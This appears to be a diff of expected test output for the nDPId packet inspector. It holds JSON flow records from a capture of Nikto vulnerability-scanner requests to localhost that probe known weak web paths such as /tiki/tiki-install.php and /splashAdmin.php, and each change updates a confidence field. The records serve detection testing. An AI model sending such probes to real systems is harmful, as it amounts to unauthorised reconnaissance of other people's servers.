00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_packet_id":1,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277492,"pkt":"AAAAAAAAAAAAAAAACABFAAC8BNZAAEAGN2R\/AAABfwAAAcWSH5DUDzwKrTgLpoAYAED+sAAAAQEICp1m\/hydZv4cR0VUIC9rYm9hcmQvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE2KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":508,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":508,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277492,"flow_last_seen":1576420277492,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277492,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50578,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/kboard\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000016)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_packet_id":1,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277495,"pkt":"AAAAAAAAAAAAAAAACABFAADBe7BAAEAGwIR\/AAABfwAAAcWUH5BTWUN0U4buRIAYAED+tQAAAQEICp1m\/h6dZv4eR0VUIC9saXN0cy9hZG1pbi8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxNykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":509,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277495,"flow_last_seen":1576420277495,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277495,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50580,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/lists\/admin\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000017)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} 
+01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="} -01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} 
+01044{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} 
+01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} 
+01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} 